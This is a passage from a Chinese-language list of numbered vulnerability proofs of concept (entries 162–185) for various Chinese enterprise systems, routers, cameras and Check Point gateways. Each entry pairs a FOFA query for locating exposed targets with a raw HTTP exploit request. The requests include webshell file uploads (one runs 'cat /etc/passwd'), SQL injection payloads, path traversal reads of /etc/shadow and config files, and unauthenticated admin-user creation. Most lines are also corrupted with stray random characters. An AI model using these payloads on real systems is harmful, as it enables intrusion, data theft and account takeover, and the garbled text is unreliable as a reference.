+ i& ~ i% ^. @! e</soap:Body>
- L" L0 G- b$ P7 p! S8 a' P% v</soap:Envelope>" d+ w5 d( s8 [ B8 F n+ t
3 V# c. F c9 A1 d
- ^$ d: l& y. E; T) l; V9 G8 o
http://x.x.x.x/dizxdell.aspx
* R/ d: x! N5 W0 G2 e
) E$ _3 h+ }3 l" t% x) f+ f6 ~162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
1 ?0 }# y' I/ a7 _FOFA: app="和丰山海-数字标牌". q( v0 c8 m e
POST /QH.aspx HTTP/1.1. V6 O3 q E: V8 i: V, P5 J* i: i4 C
Host: x.x.x.x
4 s7 I) M( Z# k. Q. \( P/ `7 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
. c6 K; k5 U" S2 q3 J _) E$ jConnection: close
6 E: Q, Q9 j! c! k- P# H" ~2 uContent-Length: 583
! w+ q& R2 W7 v7 D+ _8 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
) {+ c) M, G7 |% dAccept-Encoding: gzip7 }$ p: h0 e f6 b) {: K j
6 w' r- B( g3 V, \! A' u( \------WebKitFormBoundaryeegvclmyurlotuey
5 {6 P; _" \( P0 C$ X o, ?Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"8 h3 A* u2 P; K6 i/ ?4 f
Content-Type: application/octet-stream
$ I5 E; `: d4 \
+ q" c! Y, X. N3 }<% response.write("ujidwqfuuqjalgkvrpqy") %>+ N. Z9 S1 v, \) P! O) C2 Y: R
------WebKitFormBoundaryeegvclmyurlotuey" M d! C( K# b9 R. x8 g8 j
Content-Disposition: form-data; name="action"
) ?- ]$ g+ E: i8 _* n+ ?: ?# G
F/ A8 r* s% X: D8 D+ u2 xupload
2 R9 k* Z. U2 D, f8 F5 d) J------WebKitFormBoundaryeegvclmyurlotuey9 h! E4 b" K6 }
Content-Disposition: form-data; name="responderId"
8 t4 s: ]* t# p2 Z) @
4 V# @& h9 {# e, A4 Z) N; ` h/ jResourceNewResponder* e3 [; G3 t9 G* D" R, A
------WebKitFormBoundaryeegvclmyurlotuey$ J9 x8 ~9 i, I, i
Content-Disposition: form-data; name="remotePath"9 _: T- W6 N' h, T) P
2 B, i; J8 ?; D1 P: \; i
/opt/resources
. G' J8 [6 |2 _5 a6 P------WebKitFormBoundaryeegvclmyurlotuey--
, Z4 q- F' s/ c
+ ~2 e6 H7 d; X4 b
+ }( Z* g2 Z2 i, E( Y( U- n+ p, @* _http://x.x.x.x/opt/resources/kjuhitjgk.aspx
* Q4 W G f) D+ q
{. b6 ?% W) ?5 q. `7 j163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
5 c7 g+ {5 V6 D: o4 l# aFOFA: icon_hash="-795291075") G7 J8 b& H3 z. u; E4 ]# [
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
4 d, V$ M' I$ s1 P* s0 vHost: x.x.x.x6 h* C# k7 u) {1 a( s7 y4 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
8 X9 n$ P. ?( qConnection: close
- p* i0 e( S1 a0 @Content-Length: 293: W) F3 ^' p1 ^/ A
Accept: */*
# _ o& i" b/ ?4 rAccept-Encoding: gzip, deflate% `) y( T4 A, ~8 h% s* }
Accept-Language: zh-CN,zh;q=0.9. j" m' X! {: q% ]7 D# k! W8 m4 v
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod( U$ c( M% E& D4 g
/ o1 Q! a# ~% ]. ?: Q" ^9 V' R% o------iiqvnofupvhdyrcoqyuujyetjvqgocod2 ~- @: B% _; m- ]; v5 d
Content-Disposition: form-data; name="name"
$ Y s* g7 M$ m c
8 t. r' V1 y9 c8 ?1.php# s- e! q- y- N
------iiqvnofupvhdyrcoqyuujyetjvqgocod) D7 h. Z: s7 C4 `5 g
Content-Disposition: form-data; name="upfile"; filename="1.php"9 |/ n( g2 d- c3 U. b
Content-Type: image/jpeg# ^! x9 o& D' m) P2 u* N. F
- l: D7 E1 y' o% c: ~rvjhvbhwwuooyiioxega
: V$ f4 r7 v$ b------iiqvnofupvhdyrcoqyuujyetjvqgocod--
* @, K; h2 r* k( W2 J8 P! v( O
+ O% q l8 @. a) M; c7 B# u; ^& K! x1 Q# [4 R
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传2 I( u9 _/ P! t8 B) m
FOFA: title="智慧综合管理平台登入"
9 m4 X7 `6 H& P+ G0 h) Y6 zPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1( p' I; Z+ |0 \- k+ \+ z) e
Host: x.x.x.x
9 d7 a! ?# Q% x( x2 ~" t( TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
) g# I1 B, @# d* }3 SContent-Length: 2881 E5 g/ r2 D4 Y; R% e
Accept: application/json, text/javascript, */*; q=0.018 u* ~% G7 P ^3 W G; V5 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,( X. G- V* g* i3 ] d8 ~
Connection: close
. J, s3 e" O7 v5 A* [" X" M, d/ YContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl$ | f+ H9 r' }: c E
X-Requested-With: XMLHttpRequest
" b+ J. ~! Q& @1 s) y8 KAccept-Encoding: gzip
8 j9 t. ?" q5 v6 p' A3 x4 d1 G7 s- j3 d& Z0 i/ i# ?
------dqdaieopnozbkapjacdbdthlvtlyl$ u5 h! w* ~; q" s% v5 i. n# \
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"9 N% n5 u* D" _ l6 v. l
Content-Type: image/jpeg
' K3 S8 m; C4 e/ b+ U; ]* e# I" V
7 K0 g U. Q! N1 l8 O6 v<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
8 A, q% K0 D; \$ O( t4 g8 g; I1 C------dqdaieopnozbkapjacdbdthlvtlyl--; @. T8 p5 m K: y# R; D ~) J
1 M$ H1 W* F# b( I1 f# x J* V1 N. y, `& O7 ` N
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx# K. Y( _5 C; M
' G$ \! N( B; A2 v165. OrangeHRM 3.3.3 SQL 注入
6 |7 s' U. d% |CVE-2024-36428
?8 w" o3 d3 n( }9 XFOFA: app="OrangeHRM-产品"
) r" I- v/ F" U3 e4 DURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
8 I) h+ m ^3 c; T8 k
8 k7 Q2 j7 Y2 O {4 {; h
4 f! }4 d/ @9 H# s2 W2 d# E7 c: @166. 中成科信票务管理平台SeatMapHandler SQL注入) d: Y6 @4 l1 O0 W
FOFA:body="技术支持:北京中成科信科技发展有限公司"- @- N4 T6 l* Q8 _7 |$ e
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1% v2 \' _7 I3 t% t, g; q
Host:5 F; L. r8 B4 c6 n M9 {
Pragma: no-cache
* A) Z7 L- z9 Z, ]Cache-Control: no-cache: @( I: K r" [' j( \" y, A" x$ D
Upgrade-Insecure-Requests: 1
7 F5 |: x: W) t3 F- O$ Q, cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
4 Y- T: `7 F4 o5 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. o- s/ [2 |# z: S
Accept-Encoding: gzip, deflate7 e' [$ ~) z( [1 X* \* ]; u0 |( ^& s) U
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
$ l A; k4 A) m; e) ICookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE a, M' D4 H6 v5 x$ Y; J
Connection: close+ R. ]2 j* o0 o
Content-Type: application/x-www-form-urlencoded
$ w( b" ~4 x. g; W$ z9 jContent-Length: 890 h! B# ?+ |+ z) W+ u# e3 b
* w4 { I( W ], u6 |, lMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE4 L: J7 ^+ W0 u% Z/ U7 M
2 m8 e( i" m0 \8 z( t. q$ R! p& |! s, s! g; k
167. 精益价值管理系统 DownLoad.aspx任意文件读取6 l4 P: @+ k7 `. k7 X3 F1 X, J
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx", L5 I" J9 d: ~4 q* F3 G6 X
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1/ V4 e9 ?, y$ d7 T9 u
Host:; f0 |8 n6 Z: z; {) H( Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 B/ M: T& I4 E7 } H$ r# Q
Content-Type: application/x-www-form-urlencoded
* t; G2 V9 [! F. F- fAccept-Encoding: gzip, deflate* M4 B! R/ V3 u$ L2 q
Accept: */*% D1 \5 _2 E- ~) E8 T E) K6 j# G0 ?
Connection: keep-alive
3 O9 U" A$ F6 B% z( y# I
8 B/ Q8 y, Q% v* v7 O& u# ~2 D2 s+ F, _, t7 L4 ]1 e
168. 宏景EHR OutputCode 任意文件读取& q, i* q$ B7 _
FOFA:app="HJSOFT-HCM"
& ~. p- B/ g7 x% RGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1( Y2 {5 X g2 F
Host: your-ip! R, T4 U/ F6 e1 Z5 T; T) Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
! `3 U m$ R. rContent-Type: application/x-www-form-urlencoded
$ p) D4 i2 i/ r) _( B. S9 BConnection: close- |! E7 y, |! j2 H6 J# R
4 u* {6 m9 t$ Y8 Q" p
4 _6 y" H- A7 x7 C. Z2 V, ~6 k/ G5 h- s4 g- @& j9 e
169. 宏景EHR downlawbase SQL注入5 }3 h, r0 W- ~, h4 s+ I% d
FOFA:app="HJSOFT-HCM"
2 f/ b' d! b+ ]9 @% [, j) @GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
* X3 |) O/ w! P/ UHost: your-ip
1 o5 M4 j, n) Z- @# _& e7 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ e, `/ Q+ A+ u3 u# A2 |% c# C$ YAccept: */*, n$ {& y/ \$ t: f2 v( S! F- t
Accept-Encoding: gzip, deflate
3 }! _8 Y1 y3 E; DConnection: close
0 c4 s0 o+ s( Q5 [, V$ s6 S
4 k8 s* X0 ?- h L+ a7 b: `/ V6 G. I1 d6 M2 E2 p! @
& ~( C; H1 W& x" U4 X: I, i
170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 W" {& N# v$ {9 u
FOFA:body="/general/sys/hjaxmanage.js"0 H }! l5 Q: `2 t# S2 x2 d
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1$ }* E/ P5 B/ Q/ k, l" ^
Host: balalanengliang. O1 G% m6 g% P" b0 k
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' V" } s8 s4 p' |: _" h/ tContent-Type: application/x-www-form-urlencoded
9 s* x- [: o* Y3 ~
7 `7 ? [5 `; z9 g( O; x+ S( o, jfilename=../webapps/ROOT/WEB-INF/web.xml3 D" o& _ ^2 ^ {8 e' v, p
5 E+ Z0 \6 c$ Z- ^ ?
3 A* p5 n* `( B- A/ b d. X171. 通天星CMSV6车载定位监控平台 SQL注入7 F6 [2 o& h1 f `& [
FOFA:body="/808gps/" J5 Q' C- X; }6 o7 B- v) @$ I4 @
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
% O. x4 g) A! XHost: your-ip
9 ]: x" y* W I# [3 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
: I2 f' f- J1 X, b( F+ hAccept: */*
3 H& y% F* F$ ]% _3 O/ m& P3 E0 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ X$ X5 q7 V1 J% y
Accept-Encoding: gzip, deflate
. T' N- f0 ^4 I6 O$ u8 [Connection: close
1 m8 }3 Y7 A' y) C$ H5 @
' q- u/ W* Q1 x+ [" ^& J! M! y! v/ [# p
) x- F1 l# I) `0 M172. DT-高清车牌识别摄像机任意文件读取 J) ^0 x8 Q$ m
FOFA:app="DT-高清车牌识别摄像机"
1 q0 ^2 x9 z1 R! a2 JGET /../../../../etc/passwd HTTP/1.1
: W9 v) O* X3 N- H0 } r% r8 FHost: your-ip
8 J1 ]2 {- @+ w- H* u1 a/ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ w* v G0 m4 l4 ?4 x
Accept-Encoding: gzip, deflate6 u- g3 l. L8 c3 l8 y7 b
Accept: */*
) G: [" ^/ u) A$ P5 `; OConnection: keep-alive
6 M$ M! o( Q1 C* Y6 E) ^
$ C( I4 W! C* u0 \2 U. A* c5 O4 H8 Y2 u0 ?
9 D+ t1 a9 A9 I! [- G8 S173. Check Point 安全网关任意文件读取' ~6 o, J8 P0 L; n' Z9 ?% J& f
CVE-2024-24919( w1 U/ }9 I6 q: w- f' U9 a& x
FOFA:app="Check_Point-SSL-Network-Extender"5 q# k2 x7 N2 E X( ~
POST /clients/MyCRL HTTP/1.1) N* R: A/ H2 t+ f
Host: your-ip9 ~% n' m* ~- C& B/ V
Content-Type: application/x-www-form-urlencoded
- @2 E$ n$ N" s/ a- D" s5 D% d& S2 N% A: x
aCSHELL/../../../../../../../etc/shadow7 j/ Y/ V% A% N- w; D
/ c6 L% t3 ]! Q( W0 R% \# f/ F( _9 w* c
( Y' }, m6 q) f# W, S* W0 f5 x, f174. 金和OA C6 FileDownLoad.aspx 任意文件读取
% K) A D5 B8 l& AFOFA:app="金和网络-金和OA", _) L. K% W# o" z) L
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
- m: ?8 R7 k- a) Z0 H$ d- QHost: your-ip
) l; a# Q# z' HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 l/ o2 Z% b% J/ S4 U" q+ s/ ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( p& ~3 K7 V$ O1 b% ?& n; H( i+ z
Accept-Encoding: gzip, deflate, br. b: ^3 g- B$ b& k- o
Accept-Language: zh-CN,zh;q=0.9
! U* b/ |# E' K. H/ hConnection: close
7 I% w2 D+ C% j7 Z. e; j2 s- {& Z) O1 \$ p0 @2 D
" D5 {$ r% c/ S- ^1 S+ u* ], v& D1 }; d9 `
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
1 ^/ \) n m9 x; z" k# V" j4 PFOFA:app="金和网络-金和OA"5 \ A8 C; I- ]8 b. o: i2 u0 c
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.17 Z5 @) g z* N) z% c
Host:
6 d+ W( D! k; n" Q; i4 VUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) l! a' k& O% X2 ^# b# AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. b# G+ B' [. y9 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* o7 T3 X/ q: I0 e
Accept-Encoding: gzip, deflate8 ^2 h4 ^2 z8 v
Connection: close0 s4 d6 s4 y9 Y2 d! U
Upgrade-Insecure-Requests: 10 J' C# }9 o- v: k% n; B! u0 i
! v9 a( T' x8 `# o$ R0 j- H7 _* ]$ A
$ V- n* ?5 M: u L+ z( g: Y$ p0 s- H176. 电信网关配置管理系统 rewrite.php 文件上传
y+ N9 M) T! [( t* J; lFOFA:body="img/login_bg3.png" && body="系统登录"- g' o5 N5 a$ m9 b; t: k! k5 I) f
POST /manager/teletext/material/rewrite.php HTTP/1.1
- p- I7 B, D/ _Host: your-ip
3 X. B5 H9 d G; E* B. v) ^7 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
7 v. b2 q9 e, c0 x. NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT. |' K# C' o. r: {8 }/ E' c# a1 X/ @1 @( t
Connection: close2 A- P+ Y& L( d9 i5 }3 O$ r
6 @: o$ F( e' ]9 R: c8 O7 C, k------WebKitFormBoundaryOKldnDPT, G2 I3 n/ K7 Z7 z
Content-Disposition: form-data; name="tmp_name"; filename="test.php", {0 F( [8 }7 h0 Y5 v0 i4 \
Content-Type: image/png- H5 M. i0 M+ J; F p# }
4 e; e/ K+ F" c" j4 K
<?php system("cat /etc/passwd");unlink(__FILE__);?>4 o# ^! z- D) c L4 @
------WebKitFormBoundaryOKldnDPT% }4 w9 x' J3 l9 E; n4 W( p' T6 e! D$ H
Content-Disposition: form-data; name="uploadtime"
% M# Z' J& t" A1 z7 Y) W' ]- R 2 g. `& E9 m+ _' b7 `
3 U% V* u, h, R2 }7 O3 N |0 f" o
------WebKitFormBoundaryOKldnDPT--4 ?. B7 ?# @( q+ j8 [( Q; }$ S
% x Y9 q5 | _! G- K7 R$ H1 j- p4 S' w# M) t
5 d) p+ x* T1 o9 F* H0 x2 @# O+ `177. H3C路由器敏感信息泄露
. \0 C& P" @' k7 o: ~/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
, Z: {' B3 K) `5 C% q! _/userLogin.asp/../actionpolicy_status/../M60.cfg
* ]1 \, G8 w$ I% A/userLogin.asp/../actionpolicy_status/../GR8300.cfg" l) S; l/ S8 m
/userLogin.asp/../actionpolicy_status/../GR5200.cfg* F' Y! K' a+ L `- Z6 u& O
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
, d5 r0 D9 l9 h/userLogin.asp/../actionpolicy_status/../GR2200.cfg
' A' B1 M' a0 Q/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg3 {5 x; W$ B0 P# w: K
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
4 A3 ^$ I$ N/ ]/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
" C) W! o( K$ ` x$ b, U# r/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
3 z& y& d9 O; M+ [# l/userLogin.asp/../actionpolicy_status/../ER5200.cfg% e: C+ S: m+ u( T- b( G6 }' M
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
. H7 J" j7 ` M J" [. f/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg% N0 N( b: Y9 d! ^* n3 q
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
; r2 J Q+ s+ S6 I8 T& X9 _: F% ^/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
! R/ n2 S, B) S& d( Y' s2 i/userLogin.asp/../actionpolicy_status/../ER3200.cfg$ p% r! X4 Z% p
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg" `' l7 w5 r$ o3 O2 S6 y
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
2 ]. y- K) }& s1 c, x, N/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
1 g3 s, T/ e5 E# c/userLogin.asp/../actionpolicy_status/../ER3100.cfg9 V% {! B9 @' @
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg! I9 p F0 v2 Y6 M
5 `6 J( _) z% P
; s* W: J1 t7 e- n8 l: q* ^ v
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
a& f$ R1 s6 {8 g1 lFOFA:header="/selfservice"( u6 I" w/ C% t" H, d
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1& [$ H1 \- c" t5 T1 h& J- j
Host: ~/ C9 G5 [) s- e/ G% P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36( f3 y6 O# k0 a5 g- E; t& d
Content-Length: 252
5 U* U8 _ v# y/ |. }Accept-Encoding: gzip, deflate5 Y+ V$ Y1 I- B9 x! r. W$ e* d8 `
Connection: close$ v. }6 U) P3 n- S# K2 y2 Q
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
6 O' O8 m5 l- H% m-----------------aqutkea7vvanpqy3rh2l' a# @, ]% ~, ]. x4 C
Content-Disposition: form-data; name="12234.txt"; filename="12234"; V+ B, \8 v7 A* e( ^
Content-Type: application/octet-stream
: M3 @) L! h% ^( |' [Content-Length: 255
: b: ~8 T6 |* J0 }; t5 W
7 i T: O" m8 E. Z2 d0 d& b12234
5 n' M8 E$ ^3 m( ~" V: J7 F-----------------aqutkea7vvanpqy3rh2l--
: F& A& k6 x; F. s" l; y: n; a
% n. U3 \% U+ q5 f' M1 |. s' v G. p& q8 |, w+ h
GET /imc/primepush/%2e%2e/flex/12234.txt/ p1 ~3 m$ [, r5 p2 g
0 l3 h* c% X( i
# e. b0 ^+ ?- X. K179. 建文工程管理系统存在任意文件读取
9 i; i t; W) Y: T) fPOST /Common/DownLoad2.aspx HTTP/1.1
' B6 m7 X1 e$ i8 kHost: {{Hostname}}0 ?# |+ D( f2 u
Content-Type: application/x-www-form-urlencoded' I+ n7 D( o& C' E6 n
User-Agent: Mozilla/5.0 b w! J4 x$ |% V. ^
( f" \: G8 [" ?3 `; V, @
path=../log4net.config&Name=8 r2 o8 f0 s4 L, i5 w
0 I7 G/ z/ }' L) U X+ H( z; S, q4 @5 U$ a+ p
180. 帮管客 CRM jiliyu SQL注入( x' K8 W8 c' ]. X
FOFA:app="帮管客-CRM"% p8 P+ b. C4 V" V2 }! ~
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1( z& f j! U, S
Host: your-ip
* y! D# a1 q* uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 V3 J) [# j2 ^! F5 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 r8 y& c \5 m% Y
Accept-Encoding: gzip, deflate
% b* ^; P' j R9 g6 KAccept-Language: zh-CN,zh;q=0.9
, S8 }' @ c0 R: a& T( rConnection: close
/ Z* p. m' P. _" M5 s) @3 o0 z, U. Z- f7 @5 S$ z$ p
- D* E( v1 _' R
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入, v( g4 I5 g( M6 T4 A' h
FOFA:"PDCA/js/_publicCom.js"
" I. g# f- @- R: g2 T6 P% E) wPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1+ x* ~4 x. S9 v3 F5 v" l
Host: your-ip
& ?2 A9 R( |( K" u. EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' C& t" t5 k9 z) u1 ]! D- |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. }( m1 b5 j0 o/ a' q. D2 E% H
Accept-Encoding: gzip, deflate, br
$ L3 G% @' p: m6 i* i6 J I, \Accept-Language: zh-CN,zh;q=0.91 S8 Y$ E+ j, K3 G
Connection: close
6 ^- o$ R6 L* Y+ Y0 ~- JContent-Type: application/x-www-form-urlencoded; w, k- K; K/ B5 I
g- D# h" `, Z$ s* {
6 ?4 u' `4 P, N( W% T7 v, daction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20! T) D6 D% @# p7 h5 e4 }/ t0 H
$ b3 |! {( M4 x' t' c6 n# o0 b3 W
2 v& o. ?& u# ~) d1 S: C8 T5 ^
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建! ]2 b/ X' S7 z1 U& \
FOFA:"PDCA/js/_publicCom.js": ?( L+ _1 Y& ], Z( j+ ?
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.19 [1 Y9 B( Q. s9 J4 m% o7 t& w
Host: your-ip. o! p- U B$ b9 k( O% d& Y; Q1 Y7 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36' r1 K" S7 Z1 K* J( P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 E% y8 E6 l$ ~; ~) X6 y x. `
Accept-Encoding: gzip, deflate, br% j R7 m0 S. W* r
Accept-Language: zh-CN,zh;q=0.9
, X# f* t. n. L# l- p& iConnection: close
4 A& Z3 O* Z& N' n3 q# V( b3 U) q) V% a" tContent-Type: application/x-www-form-urlencoded' A- h; r5 Q1 o: s& X0 b& [
- a9 \' p; {: f1 _. W
, P8 D$ o% u( P# Q: C
username=test1234&pwd=test1234&savedays=1
- H2 r8 B o! `, G1 p4 k3 W0 ^8 P4 _# k4 u: w E
/ j# A; |0 x& k
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入3 |8 z3 T9 m; B1 t
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
: C9 P& |) h8 m1 |) m4 [GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1- c+ w0 U/ Z8 K: K
Host: your-ip
& Q( K2 F- A: q6 l- zUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
& d9 {; g3 O' g, _8 \9 uAccept-Charset: utf-8
6 W7 G- h( k! n: NAccept-Encoding: gzip, deflate
9 B" U! i. j) s3 z' p4 N, c s& |Connection: close
" `0 ~) V9 g5 q1 Q$ I5 w7 b6 b3 T$ O) q
& V( o) C" P6 ?5 k) c/ c3 m
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
) | n* k5 z% P5 c- MFOFA:server="SunFull-Webs"
0 C% ]- B1 G1 | rPOST /soap/AddUser HTTP/1.1
" c2 q* s7 K. S+ }1 F. yHost: your-ip- t; s# ?& t2 w, E- ?- b* c
Accept-Encoding: gzip, deflate$ R+ A+ M/ i! y8 k- W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0% D. R3 |( o; u$ c
Accept: application/xml, text/xml, */*; q=0.014 _2 B! `- W$ i \( O
Content-Type: text/xml; charset=utf-8
L; d2 t; s4 A. SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Q. ^8 s) k2 y& l; L
X-Requested-With: XMLHttpRequest
* ]5 L9 ~3 ^/ Q% `! ?
4 B, @$ U9 e% l/ B, u2 I
3 g/ J% }- t' ?insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')- i6 f1 B9 J/ p, L4 `/ c2 a9 e" Q5 w
1 f& c1 K7 F7 K/ V5 t8 ?/ H$ f5 _
. J' y1 E( C2 n2 x, [185. 瑞友天翼应用虚拟化系统SQL注入
+ N4 j, u" W3 |# e3 T4 |4 \, J+ Mversion < 7.0.5.1
* i' e. T/ Q, M0 {' QFOFA:app="REALOR-天翼应用虚拟化系统"
